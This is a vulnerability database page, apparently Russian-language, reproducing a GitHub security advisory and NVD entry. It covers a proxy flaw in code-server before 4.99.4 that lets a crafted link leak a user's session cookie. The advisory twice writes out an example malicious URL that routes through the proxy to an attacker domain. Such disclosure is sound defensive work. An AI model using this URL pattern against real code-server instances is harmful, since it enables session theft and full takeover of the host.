Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-p483-wpfp-42cj

Опубликовано: 09 мая 2025
Источник: github
Github: Прошло ревью
CVSS3: 8.3

Описание

code-server's session cookie can be extracted by having user visit specially crafted proxy URL

Summary

A maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token.

Details

Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL https://<code-server>/proxy/test@evil.com/path would be proxied to test@evil.com/path where the attacker could exfiltrate a user's session token.

Impact

Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy.

Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies.

With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server.

Patches

Patched versions are from v4.99.4 onward.

Пакеты

Наименование

code-server

npm
Затронутые версииВерсия исправления

< 4.99.4

4.99.4

EPSS

Процентиль: 19%
0.0006
Низкий

8.3 High

CVSS3

Дефекты

CWE-441

Связанные уязвимости

CVSS3: 8.3
nvd
9 месяцев назад

code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user's session token. Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running co

EPSS

Процентиль: 19%
0.0006
Низкий

8.3 High

CVSS3

Дефекты

CWE-441